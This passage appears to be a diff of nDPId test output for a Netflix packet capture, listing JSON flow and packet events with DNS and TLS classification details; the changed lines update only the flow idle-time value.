{"hostname":"23.246.11.141","url":"23.246.11.141\/?o=AQEfKq2oMrLRiWL2puNQJJ2TLhuiGLjSseu23V2HX6kIiU9JpbCaBxxaIoz21qQNKuDUaOIZwdTlx23DMVxabbCwmvEluipDW2tvFMlhMRtwdhhVlbv9KGFabiu5KH0Slx0VjOK_wzThpP7lHhWA4kW9gayYEWtjNNKe&v=3&e=1484347850&t=Dh278u2UpApOCGUj5RxV8azNWX8","code":0,"content_type":"","user_agent":"AppleCoreMedia\/1.0.0.14C92 (iPhone; U; CPU OS 10_2 like Mac OS X; en_us)"}} 
00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":1,"flow_last_seen":1484319114365,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1484319114365,"pkt":"gCqoTGHM5JjWH70UCABFAABCZ6UAAEARj63AqAEHwKgBAcmmADUALqajKFkBAAABAAAAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAE="} 00771{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6397,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
@@ -290,120 +290,120 @@ 00780{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6398,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319114365,"flow_last_seen":1484319114365,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":76,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1484319114365,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":28,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00750{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_packet_id":3,"flow_last_seen":1484319114384,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":275,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":275,"pkt_l4_len":241,"thread_ts_msec":1484319114384,"pkt":"5JjWH70UgCqoTGHMCABFAAEF4UpAAEAR1UTAqAEBwKgBBwA1yaYA8aaTKFmBgAABAAoAAAAAA2lvcwRuY2NwB25ldGZsaXgDY29tAAABAAHADAAFAAEAAAAhAA8DaW9zBG5jY3ADZ2VvwBXAMgAFAAEAAAEXABwDaW9zBG5jY3AJdXMtd2VzdC0yBnByb2RhYcAVwE0AAQABAAAALwAENCAW1sBNAAEAAQAAAC8ABDQiMaPATQABAAEAAAAvAAQ0GyTuwE0AAQABAAAALwAENCJwJsBNAAEAAQAAAC8ABDQi04bATQABAAEAAAAvAAQ0GRpcwE0AAQABAAAALwAENCDSq8BNAAEAAQAAAC8ABDQi5lM="} 
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6401,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1484319114365,"flow_last_seen":1484319114384,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":233,"flow_tot_l4_payload_len":309,"flow_avg_l4_payload_len":103,"midstream":0,"thread_ts_msec":1484319114384,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"ios.nccp.netflix.com","num_queries":1,"num_answers":10,"reply_code":0,"query_type":28,"rsp_type":1,"rsp_addr":"52.32.22.214"}} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} 
-00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} -00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} +00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319114406,"flow_last_seen":1484319114406,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319114406,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6406,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":1,"flow_last_seen":1484319114406,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319114406,"pkt":"gCqoTGHM5JjWH70UCABFAABAaktAAEAGw8fAqAEHNCAW1s\/2Abt+TgYJAAAAALAC\/\/\/LHgAAAgQFtAEDAwUBAQgKH2XpygAAAAAEAgAA"} 
+00481{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6412,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":2,"flow_last_seen":1484319114455,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319114455,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG7z\/ZJSmsOfk4GCqASOJAVRAAAAgQFtAQCCAq2sSMxH2XpygEDAwg="} +00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6414,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_packet_id":3,"flow_last_seen":1484319114457,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319114457,"pkt":"gCqoTGHM5JjWH70UCABFAAA03p5AAEAGT4DAqAEHNCAW1s\/2Abt+TgYKSUprD4AQEBVsWgAAAQEICh9l6fy2sSMx"} +00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6416,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319114406,"flow_last_seen":1484319114464,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319114464,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6423,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319114406,"flow_last_seen":1484319114523,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319114523,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01359{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6425,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"info","flow_packets_processed":7,"flow_first_seen":1484319114406,"flow_last_seen":1484319114556,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3045,"flow_avg_l4_payload_len":435,"midstream":0,"thread_ts_msec":1484319114556,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","server_names":"*.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"CN=Primary Certificate Authority (2009), ST=California, C=US, O=Netflix Inc, OU=Electronic Delivery, L=Los Gatos","subjectDN":"CN=*.nccp.netflix.com, O=Netflix, Inc., OU=Operations, C=US, ST=California, L=Los Gatos","fingerprint":"97:F6:63:95:8F:F2:5E:E0:80:12:5A:FD:BF:B2:EB:FE:A2:FE:72:33"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":1,"flow_last_seen":1484319117511,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":97,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":97,"pkt_l4_len":63,"thread_ts_msec":1484319117511,"pkt":"gCqoTGHM5JjWH70UCABFAABT2RsAAP8RXyXAqAEHwKgBAct\/ADUAP5\/hcXUBAAABAAAAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAQ=="} 
00788{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6721,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117511,"flow_last_seen":1484319117511,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":55,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1484319117511,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00682{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_packet_id":2,"flow_last_seen":1484319117538,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":225,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":225,"pkt_l4_len":191,"thread_ts_msec":1484319117538,"pkt":"5JjWH70UgCqoTGHMCABFAADT4UxAAEAR1XTAqAEBwKgBBwA1y38Av8eGcXWBgAABAAgAAAAACmFwaS1nbG9iYWwHbGF0ZW5jeQZwcm9kYWEHbmV0ZmxpeANjb20AAAEAAcAMAAEAAQAAACsABDQpHgXADAABAAEAAAArAAQ0KVZPwAwAAQABAAAAKwAENCnkd8AMAAEAAQAAACsABDQpn7bADAABAAEAAAArAAQ0J+8jwAwAAQABAAAAKwAENCc7i8AMAAEAAQAAACsABDQo+f3ADAABAAEAAAArAAQ0KRH0"} 
00802{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6726,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319117538,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"},"dns": {"query":"api-global.latency.prodaa.netflix.com","num_queries":1,"num_answers":8,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.41.30.5"}} -00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117605,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117605,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6744,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1484319117605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117605,"pkt":"gCqoTGHM5JjWH70UCABFAABArFRAAEAGeobAqAEHNCkeBc\/3Abv7qhZTAAAAALAC\/\/8qUQAAAgQFtAEDAwUBAQgKH2X1uAAAAAAEAgAA"} 
-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1484319117651,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1484319117651,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6755,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1484319117651,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1484319117651,"pkt":"gCqoTGHM5JjWH70UCABFAABAO7RAAEAG8l7AqAEHNCAW1tAAAbtmeMEgAAAAALAC\/\/8btwAAAgQFtAEDAwUBAQgKH2X15gAAAAAEAgAA"} -00482{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6758,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1484319117664,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117664,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGPb80KR4FwKgBBwG7z\/fOmYqt+6oWVKASOJB9NwAAAgQFtAQCCAqh\/Yo1H2X1uAEDAwg="} 
-00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6761,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":3,"flow_last_seen":1484319117667,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117667,"pkt":"gCqoTGHM5JjWH70UCABFAAA0nQxAAEAGidrAqAEHNCkeBc\/3Abv7qhZUzpmKroAQEBXUQwAAAQEICh9l9fSh\/Yo1"} -00885{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6764,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117605,"flow_last_seen":1484319117668,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117668,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6772,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":2,"flow_last_seen":1484319117703,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1484319117703,"pkt":"5JjWH70UgCqoTGHMCABFIAA8AABAACkGRPc0IBbWwKgBBwG70ABfA575ZnjBIaASOJAZDQAAAgQFtAQCCAq2sSZcH2X15gEDAwg="} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6773,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":3,"flow_last_seen":1484319117704,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1484319117704,"pkt":"gCqoTGHM5JjWH70UCABFAAA0fsVAAEAGr1nAqAEHNCAW1tAAAbtmeMEhXwOe+oAQEBVwIwAAAQEICh9l9hi2sSZc"} -00963{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":6774,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1484319117651,"flow_last_seen":1484319117713,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1484319117713,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"ios.nccp.netflix.com","ja3":"dc67ac8aaf8d7f69ecd6598135448f24","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-00941{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":6776,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1484319117605,"flow_last_seen":1484319117737,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1965,"flow_avg_l4_payload_len":327,"midstream":0,"thread_ts_msec":1484319117737,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"},"tls": {"version":"TLSv1.2","client_requested_server_name":"api-global.netflix.com","ja3":"d8bfad189bd26664e04570c104ee8418","ja3s":"303951d4c50efb2e991652225a6f02b1","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} 